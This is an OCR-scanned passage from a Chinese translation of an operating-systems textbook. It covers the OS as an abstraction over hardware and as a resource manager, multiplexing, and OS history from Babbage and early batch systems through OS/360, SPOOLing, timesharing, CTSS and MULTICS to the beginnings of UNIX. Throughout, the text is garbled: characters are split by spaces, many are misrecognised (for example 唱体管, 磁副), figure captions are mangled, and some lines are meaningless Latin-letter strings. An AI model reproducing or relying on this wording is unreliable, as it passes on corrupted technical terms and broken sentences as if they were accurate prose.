述 。 怀 着 对 设计 Macintosh 机 器 的 工业 设计 师 的 尊重 ， 作 者 这 里 不 得 不 
说 ， 硬 件 是 丑陋 的 。 真 实 的 处 理 器 、 内 存 条 、 伍 盘 和 其 他 厂 置 都 是 非 
常 复杂 的 ， 对 于 那些 为 使 用 某 个 硬件 而 不 得 不 编写 软件 的 人 们 而 言 ， 
他 们 使 用 的 是 困难 、 可 怕 、 特 殊 和 不 一 致 的 接口 。 有 时 这 是 由 于 需要 
兼容 有 旧 的 硬件 ， 有 时 有 是 为 了 区 省 成 本 ， 但 是 ， 有 时 人 硬件 设计 师 们 并 没 
有 意识 到 (或 在 意 ) 他 们 给 软件 设计 带 来 了 多 大 的 麻烦 。 操 作 系统 的 


一 个 主要 任务 是 隐藏 硬件 ， 呈 现 给 程序 (以 及 程序 员 ) 良好 、 清 晰 、 
优雅 、 一 致 的 抽象 。 如 图 1-2 所 示 ， 操 作 系统 将 丑陋 转变 为 闫 丽 。 


应 用 程序 


1-2 操作 系统 将 丑陋 的 硬件 转变 为 美丽 的 抽象 


需要 指出 ， 操 作 系统 的 实际 客户 是 应 用 程序 (当然 是 通过 应 用 程 
FO 。 它 们 直接 与 操作 系统 及 其 抽象 打交道 。 相 反 ， 最 终 用 户 与 用 
尸 接 口 所 提供 的 抽象 打交道 ， 或 者 是 命令 行 shell 或 者 古 图 形 接口 。 而 
用 户 接口 的 抽象 可 以 与 操作 系统 提供 的 抽象 类 似 ， 但 也 不 总 是 这 样 。 
为 了 更 清晰 地 说 明 这 一 点 ， 请 读者 考虑 普通 的 Windows 桌 面 以 及 面 癌 
行 的 命令 提示 符 。 两 者 都 是 运行 在 Windows 操 作 系 统 上 的 程序 ， 并 使 
用 了 Windows 提 供 的 抽象 ， 但 是 它们 提供 了 非常 不 同 的 用 户 接口 。 类 


似 地 ， 运 行 Gnome 或 者 KDE 的 Linux 用 户 与 直接 在 X Window 系 统 ( 面 
SCAN) 顶部 工作 的 Linux 用 户 看 到 的 是 非常 不 同 的 界面 ， 但 是 在 这 两 
种 情形 中 ， 操 作 系 统 下 面 的 抽象 是 相同 的 。 


在 本 书 中 ， 我 们 将 具体 讨论 提供 给 应 用 程序 的 抽象 ， 不 过 很 少 涉 
及 用 户 界面 。 尽 省 用 户 界面 是 一 个 巨大 和 重要 的 课题 ， 但 是 它们 毕竟 
只 和 操作 系统 的 外 围 相 关 。 


1.1.2 ”作为 贯 源 管理 彰 的 操作 系统 


把 操作 系统 看 作 是 回应 用 程序 提供 基本 抽象 的 概念 ， 是 一 种 目 顶 
问 下 的 观点 。 按 照 另 一 种 目 底 同上 的 观点 ， 操 作 系统 则 用 来 管理 一 个 
复杂 系统 的 各 个 部 分 。 现 代 计算 机 包含 处 理 硕 、 存 储 需 、 时 钟 、 磁 
盘 、 鼠 标 、 网 络 接口 、 打 印 机 以 及 许多 其 他 设备 。 从 这 个 角度 看 ， 操 
作 系统 的 任务 是 在 相互 竞争 的 程序 之 间 有 序 地 控制 对 处 理 右 、 存 储 天 
以 及 其 他 WO 接口 设备 的 分 配 。 


现代 操作 系统 允许 同时 运行 多 道 程序 。 假 设 在 一 台 计 算 机 上 运行 
的 三 个 程序 试图 同时 在 同一 台 打 印 机 上 输出 计算 结 末 ， 那 么 开始 的 几 
行 可 能 是 程序 1 的 输出 ， 接 着 几 行 古 程 序 2 的 输出 ， 然 后 又 是 程序 3 的 输 
等 ， 最 终结 果 将 十 一 团 糟 。 采 用 将 打印 结果 送 到 磁 副 上 缓冲 区 的 方 
法 ， 操 作 系 统 可 以 把 潜在 的 混乱 有 序 化 。 在 一 个 程序 结束 后 ， 操 作 系 
统 可 以 将 暂 存 在 磁盘 上 的 文件 送 到 打印 机 和 输出， 同时 其 他 程序 可 以 继 
续 产 生 更 多 的 输出 结果 ， 很 明显 ， 这 些 程序 的 输出 还 没有 真正 送 至 打 
印 机 。 


当 一 个 计算 机 (或 网 络 ) 有 多 个 用 户 时 ， 管 理 和 保护 存储 器 、1/O 
设备 以 及 其 他 资源 的 需求 变 得 强烈 起 来 ， 因 为 用 户 间 可 能 会 互相 干 
te Ab, APA MRS, DBRS (文件 、 数 据 库 


T) 。 简 而 言 之 ， 操 作 系统 的 这 一 种 观点 认为 ， 操 作 系 统 的 主要 任务 
是 记录 哪个 程序 在 使 用 什么 资源 ， 对 资源 请 求 进行 分 配 ， 评 估 使 用 代 
价 ， 并 且 为 不 同 的 程序 和 用 户 调解 互相 冲突 的 资源 请 求 。 


资源 管理 包括 用 以 下 两 种 不 同方 式 实现 多 路 复 用 (共享 ) 资源 : 

在 时 间 上 复 用 和 在 空间 上 复 用 。 当 一 种 资源 在 时 间 上 复 用 时 ， 不 同 的 
程序 或 用 户 轮流 使 用 它 。 先 是 第 一 个 获得 资源 的 使 用 ， 然 后 下 一 个 ， 
以 此 类 推 。 例 如 ， 帮 在 系统 中 只 有 一 个 CPU， 而 多 个 程序 需要 在 该 

CPU 上 运行 ， 操 作 系 统 则 首先 把 该 CPU 分 配给 某 一 个 程序 ， 在 它 运 行 
了 足够 长 的 时 间 之 后 ， 另 一 个 程序 得 到 CPU， 然 后 是 下 一 个 ， 如 此 进 
行 下 去 ， 最 终 ， 轮 到 第 一 个 程序 再 次 运行 。 至 于 资源 是 如 何 实现 时 间 
复 用 的 一 一 谁 应 该 是 下 一 个 以 及 运行 多 长 时 间 等 一 一 则 是 操作 系统 的 
任务 。 还 有 一 个 有 关 时 间 复 用 的 例子 是 打印 机 的 共享 。 当 多 个 打印 作 
业 在 一 台 打 印 机 上 排队 等 待 打印 时 ， 必 须 决 定 将 轮 到 打印 的 是 哪个 作 
业 。 


男 一 类 复 用 是 空间 复 用 。 每 个 客户 都 得 到 资源 的 一 部 分 ， 从 而 取 
代 了 客户 排队 。 例 如 ， 通 常 在 天 干 运行 程序 之 间 分 割 内 存 ， 这 样 每 一 
个 运行 程序 都 可 同时 入 住 内 存 (例如 ， 为 了 轮流 使 用 CPU) 。 假设 有 
足够 的 内 存 可 以 存放 多 个 程序 ， 那 么 在 内 存 中 同时 存放 者 干 个 程序 的 
效率 ， 比 把 所 有 内 存 都 分 给 一 个 程序 的 效率 要 高 得 多 ， 特 别 是 ， 如 采 
一 个 程序 只 需要 整个 内 存 的 一 小 部 分 时 ， 结 果 更 是 这 样 。 当 然 ， 如 此 


的 做 法 会 引起 公平 、 保 护 等 问题 ， 这 有 赖 于 操作 系统 解决 它们 。 有 关 
空间 复 用 的 其 他 资源 还 有 磁盘 。 在 许多 系统 中 ， 一 个 磁 强 同时 为 许多 
用 户 保存 文件 。 分 配 三 盘 空 间 并 记录 谁 正 在 使 用 哪个 磁 副 块 ， 是 操作 


系统 资源 管理 的 典型 任务 。 


1.2 ”操作 系统 的 历史 


操作 系统 已 经 存在 许多 年 了 。 在 下 面 的 小 节 中 ， 我 们 将 简要 地 分 
析 一 些 操 作 系 统 历 史上 的 重要 之 处 。 操 作 系 统 与 其 所 运行 的 计算 机 体 
系 结构 的 联系 非常 密切 。 我 们 将 分 析 连 续 几 代 的 计算 机 ， 看 看 它们 的 
操作 系统 是 什么 样 的 。 把 操作 系统 的 分 代 映 射 到 计算 机 的 分 代 上 有 些 
粗糙 ， 但 是 这 样 做 确实 有 某 些 作用 ， 否 则 还 没有 其 他 好 办 法 能 够 说 清 
楚 操 作 系 统 的 历史 。 


下 面 给 出 的 有 关 操 作 系统 的 发 展 主要 是 按照 时 间 线索 叙述 的 ， 且 
在 时 间 上 是 有 重 登 的。 每 个 发 展 并 不 古 等 到 先前 一 种 发 展 完 成 后 才 开 
始 。 存 在 着 大 量 的 重合 ， 不 用 说 还 存在 有 不 少 虚 假 的 开始 和 终结 时 
间 。 请 读者 把 这 里 的 文字 释 述 看 成 是 一 种 指引 ， 而 不 是 盖 想 论 定 。 


第 一 台 真 正 的 数字 计算 机 是 英国 数学 家 Charles Babbage (1792- 
1871) 设计 的 。 尽 管 Babbage 花 费 了 他 几乎 一 生 的 时 间 和 财产 ， 试 图 建 
造 他 的 “分 析 机 ”， 但 是 他 始终 未 能 让 机 器 正常 的 运转 ， 因 为 它 是 一 台 
纯 机 械 的 数字 计算 机 ， 他 所 在 时 代 的 技术 不 能 生产 出 他 所 需要 的 高 精 
度 轮 子 、 丙 轮 和 轮 牙 。 有 毫 无 疑问 ， 这 人 台 分 析 机 没有 操作 系统 。 


有 一 段 有 趣 的 历史 和 花架，Babbage 认 识 到 他 的 分 析 机 需要 软件 ， 所 
以 他 雇佣 了 一 个 名 为 Ada Lovelace 的 年 轻 妇 女 ， 作 为 世界 上 第 一 个 程 


序 员 ， 而 她 是 著名 的 英国 诗人 Lord Byron 的 女儿 。 程 序 设计 语言 Ada 则 
征 以 她 命名 的 。 


1.2.1 第 一 代 (1945~1955) : 真空 管 和 穿孔 卡 
F 


从 Babbage 失 败 之 后 一 直到 第 二 次 世界 大 战 ， 数 字 计 算 机 的 建造 几 
乎 没有 什么 进展 ， 第 二 次 世界 大 战 刺 激 了 有 关 计 算 机 研究 的 爆炸 性 开 
展 。Iowa 州 立 大 学 的 John Atanasoff 教 授 和 他 的 学 生 Clifford Berry 建 造 
了 据 认 为 是 第 一 台 可 工作 的 数字 计算 机 。 该 机 器 使 用 了 300 个 真空 管 
大 约 在 同时 ，Konrad Zuse 在 柏林 用 继电器 构建 了 Z3 计 算 机 ， 英 格 兰 布 
莱 切 利 园 的 一 个 小 组 在 1944 年 构建 了 Colossus，Howard Aiken 在 哈佛 大 
ie Markl, RY WEEK SA William Mauchley 和 他 的 学 生 
J.Presper Eckert 建 造 了 ENIAC。 这 些 机 器 有 的 是 二 进 制 的 ， 有 的 使 用 

真空 管 ， 有 的 是 可 编程 的 ， 但 是 都 非常 原始 ， 甚 至 需要 化 费 数秒 时 间 
才能 完成 最 简单 的 运算 。 


在 那个 早期 年 代 里 ， 同 一 个 小 组 的 人 (通常 是 工程 师 们 ) 设计 、 
建造 、 编 程 、 操 作 并 维护 一 台 机 器 。 所 有 的 程序 设计 是 用 纯粹 的 机 器 
语言 编写 的 ， 甚 至 更 糟糕 ， 需 要 通过 将 上 千 根 电线 接 到 插件 板 上 连接 
成 电路 ， 以 便 控 制 机 器 的 基本 功能 。 没 有 程序 设计 语言 (甚至 沪 编 语 


言 也 没有 ) ， 操 作 系 统 则 从 来 没有 听 说 过 。 使 用 机 器 的 一 般 方 式 是 ， 
程序 员 在 墙 上 的 机 时 表 上 预约 一 段 时 间 ， 然 后 到 机 房 中 将 他 的 插件 板 
接 到 计算 机 里 ， 在 接 下 来 的 几 小 时 里 ， 期 盼 正 在 运行 中 的 两 万 多 个 真 
空 管 不 会 烧 坏 。 那 时 ， 所 有 的 计算 问题 实际 都 只 是 简单 的 数字 运算 ， 
如 制作 正弦 、 余 弦 以 及 对 数 表 等 。 


到 了 20 世 纪 50 年 代 早 期 有 了 改进 ， 出 现 了 罕 孔 卡片 ， 这 时 就 可 以 
将 程序 写 在 卡片 上 ， 然 后 读 入 计算 机 而 不 用 插件 板 ， 但 其 他 过 程 则 依 
然 如 旧 。 


1.2.2 第 二 代 (1955~1965) : 唱 体 管 和 批 处 理 


20 世 纪 50 年 代 唱 体 管 的 发 明 极 大 地 改变 了 整个 状况 。 计 算 机 已 经 
(RAT Se, 厂商 可 以 成 批 地 生产 并 销售 计算 机 给 用 户 ， 用 户 可 以 指望 计 
算 机 长 时 间 运 行 ， 完 成 一 些 有 用 的 工作 。 此 时 ， 设 计 人 员 、 生 产 人 
员 、 操 作 人 员 、 程 序 人 员 和 维护 人 员 之 间 第 一 次 有 了 明确 的 分 工 。 


这 些 机 器 ， 现 在 被 称 作 大 型 机 (mainframe) ， 锁 在 有 专用 空调 的 
房间 中 ， 由 专业 操作 人 员 运 行 。 只 有 少数 大 公司 、 重 要 的 政府 部 | 或 
大 学 才 接 受 数 百 万 美元 的 标价 。 要 运行 一 个 作业 (job， 即 一 个 或 一 组 
程序 ) ， 程 序 员 首 先 将 程序 写 在 纸 上 (用 FORTRAN 语 言 或 汇编 语 
言 ) ， 然 后 穿孔 成 卡片 ， 再 将 卡片 盒 带 到 输入 室 ， 区 给 操作 员 ， 接 着 
束 哆 咖啡 直到 输出 完成 。 


计算 机 运行 完 当 前 的 任务 后 ， 其 计算 结果 从 打印 机 上 和 输出， 操作 
员 到 打印 机 上 撕 下 运算 结果 并 送 到 输出 室 ， 程 序 员 稍 后 就 可 取 到 结 
Ro PS, BREF RA SER ABABA PIAA MES © WR 
需要 FORTRAN 编 译 器 ， 操 作 员 还 要 从 文件 柜 把 它 取 来 读 入 计算 机 。 当 
操作 员 在 机 房 里 走 来 走 去 时 许多 机 时 被 浪费 掉 了 。 


由 于 当时 的 计算 机 非常 昂贵 ， 人 们 很 自然 地 要 想 办 法 减少 机 时 的 
浪费 。 通 常 采 用 的 解决 方法 就 是 批 处 理 系统 (batch system) 。 其 思想 
是 : 在 输入 室 收 集 全 部 的 作业 ， 然 后 用 一 台 相 对 便宜 的 计算 机 ， 如 
IBM 1401 计 算 机 ， 将 它们 读 到 磁带 上 。IBM 1401 计 算 机 适用 于 读 卡 
上 请、 复制 磁带 和 输出 打印 ， 但 不 适用 于 数值 运算 。 另 外 用 较 昂 贵 的 计 
算 机 ， 如 IBM 7094 来 完成 真正 的 计算 。 这 些 情况 如 图 1-3 所 示 。 


输入 . 输出 
磁带 机 磁带 系统 磁带 。 磁带 
= ara ara A fz 打印 机 
oA INN 


| 7094 | TT 
LL JA 


a) b) c) d) e) f) 


图 1-3 一 种 早期 的 批 处 理 系 统 : a) 程 序 员 将 卡片 拿 到 1401 机 处 ; 

b)1401 机 将 批 处 理 作 业 读 到 人 磁带 上 ;cc) 操 作 员 将 输入 带 送 至 7094 机 .; 

d)7094 机 进行 计算 ;e) 操 作 员 将 输出 磁带 送 到 1401 机 ;，f)1401 机 打印 输 
出 


在 收集 了 大 约 一 个 小 时 的 批量 作业 之 后 ， 这 些 卡 片 被 恋 进 磁 市 ， 
然后 磁带 被 送 到 机 房 里 并 装 到 磁带 机 上 “。 随 后 ， 操 作 员 装 入 一 个 特殊 
的 程序 (现代 操作 系统 的 前 身 ) ， 它 从 磁带 上 读 入 第 一 个 作业 并 运 
行 ， 其 输出 写 到 第 二 盘 磁 市 上 ， 而 不 打印 。 每 个 作业 结束 后 ， 操 作 系 
统 目 动 地 从 磁带 上 读 入 下 一 个 作业 并 运行 。 当 一 批 作业 完全 结束 后 ， 


操作 员 取 下 输入 和 输出 磁 市 ， 将 输入 磁 市 换 成 下 一 批 作业 ， 并 把 输出 
磁带 拿 到 一 台 1401 机 器 上 进行 脱 机 〈 不 与 主 计 算 机 联机 ) 打印 。 


典型 的 输入 作业 结构 如 图 1-4 所 示 。 一 开始 是 张 8JOB 卡 片 ， 它 标识 
出 所 需 的 最 大 运行 时 间 (以 分 钟 为 单位 ;、 计 费 账号 以 及 程序 员 的 名 
字 。 接 着 是 $4FORTRAN 卡 片 ， 通 知 操作 系统 从 系统 磁带 上 装 入 
FORTRAN 语 言 编译 器 。 之 后 就 是 待 编译 的 源 程 序 ， 然 后 是 $SLOAD 卡 
上 请， 通知 操作 系统 装 入 编译 好 的 目标 程序 。 接 着 是 $RUN 卡 请， 告诉 操 
作 系 统 运 行 该 程序 并 使 用 随后 的 数据 。 最 后 ，$END 卡 片 标识 作业 结 
束 。 这 些 基 本 的 控制 卡片 是 现代 shell 和 命令 解释 器 的 先驱 。 


一 一 程序 的 数据 一 一 


FORTRAN 程 序 


$FORTRAN 
$JOB, 10,6610802, MARVIN TANENBAUM 


图 1-4 典型 的 FMS 作 业 结 构 


第 二 代 大 型 计算 机 主要 用 于 科学 与 工程 计算 ， 例 如， 解 偏 微 分 方 
程 。 这 些 题 日 大 多 用 FORTRAN 语 言 和 汇编 语言 编写 。 典 型 的 操作 系统 
是 FMS (FORTRAN Monitor System, FORTRAN AZ) 和 IBSYS 
(IBM 为 7094 机 配备 的 操作 系统 ) 。 


123 第 三 代 (1965~1980) : 集成 电路 芯片 和 
多 道 程序 设计 


20 世 纪 60 年 代 初 期 ， 大 多 数 计算 机 广 商都 有 两 条 不 同 并 且 完 全 不 
兼容 的 生产 线 。 一 条 是 面向 字 的 、 大 型 的 科学 用 计算 机 ， 诸 如 IBM 
7094， 主 要 用 于 科学 和 工程 计算 。 另 一 条 是 面向 字符 的 、 商 用 计算 
机 ， 诸 如 IBM 1401， 银 行 和 保险 公司 主要 用 它 从 事 人 磁带 归档 和 打印 服 


务 。 


开发 和 维护 两 种 完全 不 同 的 产品 ， 对 厂商 来 说 是 昂贵 的 。 另 外 ， 
许多 新 的 计算 机 用 户 一 开始 时 只 需要 一 台 小 计算 机 ， 后 来 可 能 又 需要 
一 台 较 大 的 计算 机 ， 而 且 希 望 能 够 更 快 地 执行 原 有 的 程序 。 


IBM 公 司 试图 通过 引入 Systeny360 来 一 次 性 地 解决 这 两 个 问题 。 
360 是 一 个 软件 兼容 的 计算 机 系列 ， 其 低档 机 与 1401 相 当 ， 高 档 机 则 比 
7094 功 能 强 很 多 。 这 些 计算 机 只 在 价格 和 性 能 〈 最 大 存储 器 容量 、 处 
理 器 速度 、 允 许 的 VO 设备 数量 等 ) 上 有 差异 。 由 于 所 有 的 计算 机 都 有 
相同 的 体系 结构 和 指令 集 ， 因 此 ， 在 理论 上 ， 为 一 种 型 号 机 器 编写 的 
程序 可 以 在 其 他 所 有 型 号 的 机 器 上 运行 。 而 且 360 被 设计 成 既 可 用 于 科 
学 计算 ， 又 可 用 于 商业 计算 ， 这 样 ， 一 个 系列 的 计算 机 便 可 以 满足 所 
有 用 户 的 要 求 。 在 随后 的 几 年 里 ，IBM 使 用 更 现代 的 技术 陆续 推出 了 


360 的 后 续 机 型 ， 如 著名 的 370、4300、3080 和 3090 系 列 。zSeries 是 这 
个 系列 的 最 新 机 型 ， 不 过 它 与 早期 的 机 型 相 比 变化 非常 之 大 。 


360 是 第 一 个 采用 (小 规模 ) 芯片 (集成 电路 ) 的 主流 机 型 ， 与 采 
用 分 立 品 体 管制 造 的 第 二 代 计 算 机 相 比 ， 其 性 能 /价格 比 有 很 大 提高 。 
360 很 快 束 获得 了 成 功 ， 其 他 主要 厂商 也 很 快 采 纳 了 系列 兼容 机 的 思 
想 。 这 些 计算 机 的 后 代 仍 在 大 型 的 计算 中 心里 使 用 。 现 在 ， 这 些 计算 
机 的 后 代 经 常用 来 管理 大 型 数据 库 《如 航班 定 票 系统 ) 或 作为 web 站 
扩 的 服务 器 ， 这 些 服 务 右 每 秒 必须 处 理 数 干 次 的 请 求 。 


“单一 家 族 ” 思 想 的 最 大 优点 同时 也 是 其 最 大 的 缺点 。 原 因 在 于 所 
有 的 软件 ， 包 括 操作 系统 OS/360， 要 能 够 在 所 有 机 器 上 运行 。 从 小 的 
代 若 1401 把 卡片 复制 到 磁 市 上 的 机 器 ， 到 用 于 代 奉 7094 进 行 气象 预报 
及 其 他 繁重 计算 的 大 型 机 ， 从 只 能 市 很 少 外 部 设备 的 机 器 到 有 很 多 外 
设 的 机 侨 ， 从 两 业 领域 到 科学 计算 领域 等 。 总 之 ， 它 要 有 效 地 适用 于 
所 有 这 些 不 同 的 用 途 。 


IBM (或 其 他 公司 ) 无 法 写 出 同时 满足 这 些 相 互 冲 突 需 要 的 软 
件 。 其 结果 十 一 个 庞大 的 又 极其 复杂 的 操作 系统 ， 它 比 FMS 大 了 约 2 一 
3 个 数量 级 规模 。 其 中 包含 数 干 名 程序 员 写 的 数 百 万 行 汇 编 语言 代码 ， 
也 包含 成 千 上 万 处 错误 ， 这 就 导致 BM 不 断 地 发 行 新 的 版 本 试图 更 正 
这 些 错误 。 每 个 新 版 本 在 修正 老 错误 的 同时 又 引入 了 新 错误 ， 所 以 随 
着 时 间 的 流逝 ， 错 误 的 数量 可 能 大 致 保持 不 变 。 


OS/360 的 设计 者 之 一 Fred Brooks 后 来 写 过 一 本 既 该 谐 又 尖锐 的 书 
(Brooks,1996) ， 描 述 他 在 开发 OS/360 过 程 中 的 经 验 。 我 们 不 可 能 在 
这 里 复述 该 书 的 全 部 内 容 ， 不 过 其 封面 已 经 充分 表述 了 Fred Brooks 的 
观点 ， 一 群 史 前 动物 陷入 泥潭 而 不 能 自拔 。Silberschatz 等 人 著作 
(2005) 的 封面 也 表达 了 操作 系统 如 同 恐 龙 一 般 的 类 似 观 点 。 


抛 开 OS/360 的 庞大 和 存在 的 问题 ，OS/360 和 其 他 公司 类 似 的 第 三 
代 操 作 系统 的 确 合理 地 满足 了 大 多 数 用 户 的 要 求 。 同 时 ， 它 们 也 使 第 
二 代 操 作 系统 所 缺乏 的 几 项 关键 技术 得 到 了 广泛 应 用 。 其 中 最 重要 的 
应 该 是 多 道 程序 设计 (multiprogramming) 。 在 7094 机 上 ， 若 当前 作 
业 因 等 待 磁带 或 其 他 MO 操作 而 暂停 时 ，CPU 就 只 能 简单 地 踏步 直至 该 
IO 完成 。 对 于 CPU 操作 密集 的 科学 计算 问题 ，IO 操 作 较 少 ， 因 此 沪 
费 的 时 间 很 少 。 然 而 ， 对 于 商业 数据 处 理 ，LIO 操 作 等 待 的 时 间 通 常 占 
到 80%~90%， 所 以 必须 采取 某 种 措施 减少 (昂贵 的 ) CPU 空闲 时 间 
的 浪费 。 


解决 方案 是 将 内 存 分 儿 个 部 分 ， 每 一 部 分 存放 不 同 的 作业 ， 如 图 
1-5 所 示 。 当 一 个 作业 等 每 WO 操作 完成 时 ， 男 一 个 作业 可 以 使 用 
CPU。 如 采 内 存 中 可 以 同时 存放 足够 多 的 作业 ， 则 CPU 利用 率 可 以 接 
近 1009%“。 在 内 存 中 同时 驻 留 多 个 作业 需要 特殊 的 硬件 来 对 其 进行 保 
护 ， 以 避免 作业 的 信息 被 家 取 或 受到 攻击 。360 及 其 他 第 三 代 计 算 机 都 
配 有 此 类 硬件 。 


ATF 
分 区 


操作 系统 


图 1-5 一 个 内 存 中 有 三 个 作业 的 多 道 程序 系统 


第 三 代 计 算 机 的 另 一 个 特性 是 ， 卡 卢 被 拿 到 机 房 后 能 够 很 快 地 将 
作业 从 卡片 读 入 磁盘 。 于 是 ， 任 何 时 刻 当 一 个 作业 运行 结束 时 ， 操 作 
系统 瓯 能 将 一 个 新 作业 从 磁盘 读 出 ， 装 进 空 出 来 的 内 存 区 域 运行 。 这 
种 技术 叫做 同时 的 外 部 设备 联机 操作 (Simultaneous Peripheral 
Operation On Line, SPOOLing) ， 该 技术 同时 也 用 于 输出 。 当 采用 了 
SPOOLing 技 术 后 ， 就 不 再 需要 IBM 1401 机 ， 也 不 必 再 将 磁带 搬 来 搬 
ETS 


第 三 代 操 作 系统 很 适 于 大 型 科学 计算 和 繁忙 的 商务 数据 处 理 ， 但 
其 实质 上 仍旧 是 批 处 理 系统 。 许 多 程序 员 很 怀念 第 一 代 计算 机 的 使 用 
方式 。 那 时 ， 他 们 可 以 几 个 小 时 地 独占 一 人 台 机 器， 可 以 即时 地 调试 他 
们 的 程序 。 而 对 第 三 代 计算 机 而 言 ， 从 一 个 作业 提交 到 运算 结 采 取 回 


往往 长 达 数 小 时 ， 更 有 甚 者 ， 一 个 有 逗号 的 误 用 吏 会 导致 编译 失败 ， 而 
可 能 浪费 了 程序 员 半 天 的 时 间 。 


程序 员 们 的 希望 很 快 得 到 了 响应 ， 这 种 需求 导致 了 分 时 系统 

(timesharing) 的 出 现 。 它 实际 上 是 多 道 程序 的 一 个 变 体 ， 每 个 用 户 
都 有 一 个 联机 终端 。 在 分 时 系统 中 ， 假 设 有 20 个 用 户 登 录 ， 其 中 17 个 
在 思考 、 谈 论 或 喝 咖啡 ， 则 CPU 可 分 配给 其 他 三 个 需要 的 作业 轮流 执 
行 。 由 于 调试 程序 的 用 户 常常 只 发 出 简短 的 命令 (如 编译 一 个 五 页 的 
源 文 件 ) ， 而 很 少 有 长 的 费时 命令 〈 如 上 百 万 条 记录 的 文件 排序 ) ， 
所 以 计算 机 能 够 为 许多 用 户 提供 快速 的 交互 式 服 务 ， 同 时 在 CPU 空 闲 
时 还 可 能 在 后 台 运 行 一 个 大 作业 。 第 一 个 通用 的 分 时 系统 ， 兼 容 分 时 
系统 (Compatible Time Sharing System, CTSS) MIT (MARL 
院 ) 在 一 台 改 装 过 的 7094 机 上 开发 成 功 的 《Corbat6 等 人 ，1962 年 ) 。 
但 直到 第 三 代 计 算 机 广泛 采用 了 必需 的 保护 硬件 之 后 ， 分 时 系统 才 逐 
渐 流 行 开 来 。 


在 CTSS 成 功 研制 之 后 ，MIT、 贝 尔 实验 室 和 通用 电气 公司 
GE， 当时 一 个 主要 的 计算 机 制造 三 商 ) 决定 开发 一 种 “公用 计算 服 
务 系统 ”， 能 够 同时 文 持 数 百 名 分 时 用 户 的 一 种 机 器 。 它 的 模型 借鉴 了 
供电 系统 一 一 当 需 要 电能 时 ， 只 需 将 电气 设备 接 到 墙 上 的 插座 即 可 ， 
于 是 ， 在 合理 范围 内 ， 上 所 需要 的 电能 随时 可 提供 。 该 系统 称 作 


MULTICS (MULTiplexed Information and Computing Service) , Hix 


计 者 着 上 腿 于 建造 满足 波士顿 地 区 所 有 用 户 计算 需求 的 一 台 机 器 。 在 当 
时 看 来 ， 仅 仅 40 年 之 后 ， 就 能 成 百 万 台地 销售 (价值 不 到 1 千 美 元 ) 速 
度 是 GE-645 主 机 10 000 倍 的 计算 机 ， 完 全 是 科学 幻想 。 这 种 想法 同 现 
在 天 于 穿越 大 西洋 的 超 首 速 海底 列车 的 想法 一 样 ， 十 4] 想 。 


MULTICS 得 到 一 种 混合 式 的 成 功 。 尽 管 这 台 机 絮 具 有 较 强 的 /O 
能 力 ， 却 要 在 一 台 仅 仅 比 Intel 386 PC 性 能 强 一 点 的 机 器 上 支持 数 百 个 
用 户 。 可 是 这 个 想法 并 不 像 表 面 上 那么 蕊 唐 ， 因 为 那 时 的 人 们 已 经 知 
道 如 何 编写 精练 的 高 效 程序 ， 而 这 种 技巧 随后 逐渐 丢失 了 “。 有 许多 原 
因 造 成 MULTICS 没 有 能 够 普及 到 全 世界 ， 至 少 它 不 应 该 采用 PL/1 编 
写 ， 因 为 PL/1 编 诺 器 推迟 了 好 几 年 才 完成 ， 好 不 容易 完成 的 编译 项 叉 
极 少 能 够 成 功 运行 。 另 外 ， 当 时 的 MULTICS 有 太 大 的 野心 ， 犹 如 19 世 
纪 中 期 Charles Babbage 的 分 析 机 。 


简要 地 说 ，MULTICS 在 计算 机 文献 中 播撒 了 许多 原创 的 概念 ， 但 
要 将 其 造成 一 台 真 正 的 机 器 并 想 实现 商业 上 的 巨大 成 功 的 研制 难度 超 
出 了 所 有 人 的 预料 。 贝 尔 实验 室 退 出 了 ， 通 用 电气 公司 也 退出 了 计算 
机 领域 。 但 是 M.I 工 坚持 下 来 并 且 最 终 使 MULTICS 成 功 运行 。 
MULTICS 最 后 成 为 商业 产品 ， 由 购买 了 通用 电气 公司 计算 机 业务 的 公 
司 (Honeywell) 销售 ， 并 安装 在 世界 各 地 80 多 个 大 型 公司 和 大 学 中 。 
尽管 MULTICS 的 数量 很 小 ， 但 是 MULTICS 的 用 户 们 却 非 常 忠诚 ， 例 
如 ， 通 用 汽车 、 福 特 和 美国 国家 安全 局 直到 20 世 纪 90 年 代 后 期 ， 在 试 


图 让 Honeywell 更 新 其 硬件 多 年 之 后 ， 才 关闭 了 他 们 的 MULTICS 系 
统 ， 而 这 已 经 是 在 MULTICS 推 出 之 后 30 年 了 。 


目前 ， 计 算 服 务 的 概念 已 经 被 遗弃 ， 但 是 这 个 概念 十 可 以 回归 
的 ， 以 大 量 的 、 附 有 相对 简单 用 户 机 右 的 、 集 中 式 Intermet 服 务 器 形式 
回归 。 在 这 种 形式 中 ， 主 要 工作 在 大 型 服务 右上 完成 。 而 回归 的 动机 

征 多 数 人 不 愿意 管理 日 花 过 分 复杂 的 计算 机 系统 ， 宁 可 让 那些 运 
行 服务 器 公司 的 专业 团队 去 做 。 电 子 商务 已 经 辣 这 个 方向 演化 了 ， 和 
种 公司 在 多 处 理 絮 的 服务 右上 经 营 各 目的 电子 商场 ， 人 简单 的 客户 端 连 
接着 多 处 理 器 服务 器 ， 这 同 MULTICS 的 设计 精神 非常 类 似 。 


尽管 MULTICS 在 商业 上 失败 了 ， 但 MULTICS 对 随后 的 操作 系统 
却 有 着 巨大 的 影响 ， 详 情 请 参阅 有 关 文 献 和 书籍 (Corbat6 等 人 ， 
1972; Corbat6 和 Vyssotsky，1965; Daley 和 Dennis，1968; Organick, 
1972; Saltzer, 1974) 。 还 有 一 个 曾经 现在 仍然 ) 活跃 的 Web 站 点 
www.multicians.org， 上 面 有 大 量 关 于 系统 、 设 计 人 员 以 及 其 用 户 的 信 


FABER ° 


ANEZA LEE E ae“) ALE, L196 14F DEC 
的 PDP-1 作 为 起 点 。PDP-1 计 算 机 只 有 4K 个 18 位 的 内 存 ， 每 台 售 价 120 
000 美 元 (不 到 IBM 7094 的 5%) ， 该 机 型 非常 热 销 。 对 于 某 些 非 数值 
的 计算 ， 它 和 7094 几 乎 一 样 快 。PDP-1 开 辟 了 一 个 全 新 的 产业 。 很 快 


有 了 一 系列 PDP 机 型 (与 BM 系列 机 不 同 ， 它 们 互 不 兼容 ) ， 其 顶峰 
为 PDP-11 。 


一 位 曾 参加 过 MULIICS 研 制 的 贝尔 实验 室 计算 机 科学 家 Ken 
Thompson， 后 来 找到 一 台 无 人 使 用 的 PDP-7 机 器 ， 并 开始 开发 一 个 简 
化 的 、 单 用 户 版 MULTICS。 他 的 工作 后 来 导致 了 UNIX 操 作 系 统 的 诞 
生 。 接 着 ，UNIX 在 学 术 界 ， 政 府 部 门 以 及 许多 公司 中 流行 。 


